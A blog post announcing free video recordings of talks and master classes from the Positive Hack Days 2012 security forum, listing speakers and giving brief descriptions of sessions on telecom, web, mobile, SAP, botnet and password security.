Videos from Positive Hack Days 2012 - open access

On May 30 and 31, the Digital October technocenter hosted the international forum Positive Hack Days 2012 , dedicated to practical safety issues. One and a half thousand people, dozens of reports and workshops, large-scale CTF competitions, a rich competitive program - all this is PHDays. Now we can say with full responsibility that we managed to mix a special cocktail from representatives of the Internet community, information security professionals and hackers from different countries of the world and that the cocktail turned out to be delicious.

Today, as promised, we will publish records of reports and master classes from PHDays 2012. Among the gigabytes of information security video, there is a thing, as they say, Goethe’s Faust, a report by Bruce Schneier, the legend of world cryptography. Enjoy watching!
')

Key reports

A video of the Bruce Schneier report is available at this link (starting at 13:00). The cryptography guru spoke about his security philosophy, which surprised many. Violators of the law (hackers), in his opinion, are not only harmful, but also useful.

Datuk Mohd Nur Amin is the chairman of the International Multilateral Partnership Against Cyber Threats (IMPACT), the first United Nations public and state organization that aims to combat cyber threats and collaborates with the International Telecommunication Union (ITU), a specialized UN agency. IMPACT is recognized as the world's largest security organization in cyberspace. It consists of 137 countries [ video ].

Telecom

Report: Sergey Gordeychik, “How to hack a telecom and stay alive - 2. Reach the billing” [ video ].

Where are the keys to the technology network? How to get hold of billing without creating problems for the company's main business? On this, as well as new indicative and amusing cases of testing for the penetration of telecommunications networks, Sergey said in his report.

Section: Evgeny Klimov, “RISSPA. Telecom v. Fraud: who will win? ” The video is available at this link (starting at 12:15).

Government sector

Report: Mikhail Emelyannikov, “When and why it is impossible not to violate the Russian law on personal data” [ video ].

Report: Andrey Valerievich Fedichev, FSTEC of Russia, “Why do state secrets appear on the Internet?” [ Video ].

Report: Alexey Lukatsky, “How does the election of the President of Russia affect the information security market, or where is the regulation going?” Video is available at this link (starting at 16:00).

Network security

Report: Vladimir Styran, “The Truth About the Lie: Social Engineering for Safety Guards” [ video ].

Master class: Andrei Masalovich, Competitive Intelligence on the Internet. The video is available at this link (from 16:08).

Participants in the master class, on examples of real-world competitive intelligence tasks, got acquainted with analytical technologies, in particular, with methods for quickly detecting leaks of confidential information, as well as open sections on servers, methods of penetrating FTP servers without breaking the protection and detecting leaks of passwords, methods of obtaining access to confidential documents bypassing DLP and entering sections without proper permissions (error 403). The demonstration was conducted on examples of portals of obviously well-protected companies (leaders of IT and information security markets, large government agencies, special services).

Master class: Dmitry Ryzhavsky, “Wireless LAN security: how your network was hacked and how you could avoid it” [ video ].

During the presentation, the most relevant methods of obtaining unauthorized access to the Wi-Fi network were considered, and the mechanisms proposed by the comprehensive Cisco Unified Wireless Network to protect against these attacks were demonstrated.

Master class: Sergey Lozhkin, "Investigation of computer incidents." Video is available at this link (from 14:00).

The master class was devoted to investigating incidents involving unauthorized access to Internet resources. The presenter introduced the listeners with a psychological portrait of a modern hacker and spoke about the types of intruders. The process of working on the incident was considered: from detecting traces of malicious actions and responding to burglary signals to searching for an intruder in collaboration with law enforcement agencies. In addition, guests of the forum heard a fascinating story about real security incidents.

Master class: Nikhil Mittal, “We create chaos with input-output devices” [ video ].

At this master class, a very important, but universally ignored aspect of computer security was discussed - the vulnerability of devices designed to interact with a human being (Human Interface Devices, HID).

Report: Sylvain Muneaud, “Malefactors use Calypso phones” [ video ].

Report: Andrei Kostin, “PostScript: danger! Hacking MFP, PC and not only "[ video ].

Report: Sergey Klevogin, “CEH. Ethical hacking and penetration testing ”[ video ].

Participants of the master class got acquainted with typical vulnerabilities of network protocols, operating systems and applications. In the course of his presentation, the moderator described the sequence of various types of attacks on computer systems and networks, and also made recommendations to enhance their security. The listeners plunged into the practical environment and saw how to truly hack the system - in order to subsequently predict the hacker's actions and successfully counter them.

Report: Travis Goodspeed, “Operation of Radio Interference Using Packets-in-Packets Technology” The video is available at this link (from 15:10).

The speaker spoke about the features of PIP exploits and provided examples for IEEE 802.15.4 networks and Nordic RF low-power radio modules.

SAP, SCADA, ERP

Report: Aleksey Yudin, “ERP through the eyes of an intruder”. The video is available at this link (from 15:00).

Report: Andrei Petrovich Dukvalov, “Protection of industrial information systems - the factor of human survival” [ video ].

Report: Evgenia Schumacher, “How to find out the salary of a colleague without getting up from the workplace, or SAP HR Security” [ video ].

Report: Alexander Polyakov, “SAP insecurity : new and better” [ ide ].

The report was devoted to the ten most interesting vulnerabilities and attack vectors on SAP systems: from encryption problems to authentication bypass, from funny errors to complex attack vectors. The public was acquainted with a considerable part of the vulnerabilities presented in the report for the first time.

Master class: Alexey Yudin, "Do-it-yourself SAP Security" [ video ].

Participants in this master class learned how to conduct basic security analysis of SAP R / 3 and NetWeaver systems (including application servers and infrastructure) using the available tools.

Web security

Master class: Vladimir Lepikhin, Attacks on web applications. The basics. The video is available at this link (from 09:00).

The report systematically presented the mechanisms for implementing attacks against web applications, tricks and tools of intruders (specialized security scanners, utilities, using the results of their work in the course of manual analysis). Practical examples clearly demonstrated the main weaknesses of web applications that make attacks possible, and also illustrated the shortcomings of the security tools used and workarounds.

Report: Miroslav Shtampar, “Data leaks through DNS: using sqlmap” [ video ].

The speaker presented a technique of DNS exfiltration using SQL injections, spoke about its pros and cons, and also conducted visual demonstrations.

Report: Vladimir Vorontsov, “Attacks on Microsoft Network Web Clients” [ video ].

The report described methods that allow attacks by users of the Internet Explorer browser within Microsfot networks, and attacks aimed at obtaining confidential user data located on both remote servers (bypassing access policy restrictions) and on local PCs.

Master class: Andres Ryancho, “Security Web 2.0. Advanced technology [ video ].

At the master class, techniques for protecting against attacks using XML, HPP / HPC, as well as attacks such as Click Jacking and Session Puzzling were considered.

Report: Sergey Shcherbel, "Not all PHP is equally useful." The video is available at this link (from 16:00).

The report examined the identified security issues and features of the operation of web applications when using third-party implementations of PHP, and also provides examples of zero-day vulnerabilities.

Report: Thibault Koechlen, “Naxsi is an open source web application firewall based on a positive security model” [ video ].

Report: Alexey Moskvin, "On the safe use of PHP wrappers" [ video ].

Report: Vladimir Kochetkov, “Hack a site on ASP.NET? Difficult, but possible! ”[ Video ].

The report reviewed examples of zero-day vulnerabilities and possible techniques for their operation, including a fundamentally new type of “Code injection” attacks.

Mobile Security

Master class: Manish Chasta, "Security apps for Android" [ video ].

The report briefly highlighted the detection and elimination of vulnerabilities in Android Mobile applications. In addition, the presentation addressed the issues of obtaining administrator rights for devices running on the Android platform (Android rooting), analyzing SQLite databases, using the Android Debug Bridge package (ADB) and threats associated with a mobile server. The list of ten most dangerous threats for mobile applications, published by the community Open Web Application Security Project (OWASP), was also presented to the audience.

Report: Markus Nimitz, "Interception of the user interface in Android" [ video ].

Master class: Sergey Nevstruev, “Practical aspects of mobile security” [ video ].

Fighting botnets
Report: Maria Garnayeva, "Methods of inserting sticks into the wheels of the botmasters: the Kelihos botnet." The video is available at this link (from 09:10).

Report: Alexander Gostev. Initially, the report was called “The Mystery of DuQu”, but then the speaker decided to focus on the new threat called Flame. Video is available at this link (from 14:00).

Report: Alexander Lyamin, “DDoS: A Practical Guide to Survival. Part 2". The video is available at this link (from 17:03).

Report: Fedor Yarochkin, Vladimir Kropotov, "The life cycle of botnets and their detection by analyzing network traffic" [ video ].

Master class: Pierre-Marc Bureau. "Win32 / Georbot. Features of malware and their automated analysis ”[ video ]. The world's first master class for this botnet.

Password Protection Issues

Report: Alexey Evgenievich Zhukov, “Lightweight cryptography: undemanding to resources and resistant to attacks”. Video is available at this link (starting at 12:00).

Report: Dmitry Sklyarov, Andrei Belenko, “Secure Password Managers and Military-Grade Encryption for smartphones:“ Che, seriously? .. ””. The video is available at this link (starting at 10:15).

Report: Alexander (Solar Designer) Peslyak, “Password Protection: Past, Present, Future” [ video ].

The presentation addressed issues of password protection, the history of development and the immediate prospects of authentication technology.

Report: Benjamin Delpi, Mimikatz. Recover Windows 8 passwords [ video ].

Hackers and money

Section: Artem Sychev, “How do they protect money?” [ Video ].

Report: Dmitry Gorelov, "Smart Cards in Russia: from Payphones to UEC". The video is available at this link (starting at 10:00).

Report: Alexander Matrosov, Evgeny Rodionov, "Vulnerabilities of smart cards from the point of view of modern banking malware." The video is available at this link (starting at 11:07).

In preparing the report "Vulnerabilities of smart cards from the point of view of modern banking malware," the speakers conducted a study of the most common such programs, and also revealed interesting vulnerabilities when using two-factor authentication and smart cards. In addition, the report examines the techniques and cleverness of intruders that impede the conduct of forensic examination.

Report: Mikha Borrmann, “Do you pay by credit card on the Internet? Get ready for a headache. ”[ Video ].

Practical safety

Master class: Boris Ryutin, "Security without antiviruses" [ video ].

The four-hour master class, whose participants acquired basic skills for detecting Trojans in the operating system, learned the latest technologies for developing Trojans for Windows (SpyEye, Carberp, Duqu), reviewed Trojans for Android, and also got acquainted with the analysis of actual exploits (PDF, Java) .

Report: Yuri Gubanov, "How to find an elephant in a haystack" [ video ].

Report: Dmitry Evdokimov, “Code Analysis Tools: Light and Dark Side” [ video ].

Dmitriy considered ways to instrument the source code, bytecode and binary code.

Report: Nikita Tarakanov, Alexander Bazhanyuk, "Automatic tool for finding vulnerabilities." The video is available at this link (starting at 17:00).

Report: Igor Kotenko, “Cyber warfare of software agents: applying the theory of teamwork of intelligent agents to build cyber warmest” [ video ].

Report: Ulrich Fleck, Martin Eisner, “Attacks from 0-day to APT using the example of a popular framework” [ video ].

Section: “It’s better to see once” demo section. The video is available at this link (from 17:10).

Anonymous and LulZ

Report: Jerry Gamblin, “What lesson can (and should) be taken out of the story with LulzSec” [ video ].
During the report, Jerry became the object of "trolling" by a group of people, but reacted with an amazing sense of humor [ video ].

Report: Hayzem El Mir, "How Tunisia Confronted Anonymous." The video is available at this link (from 14:10).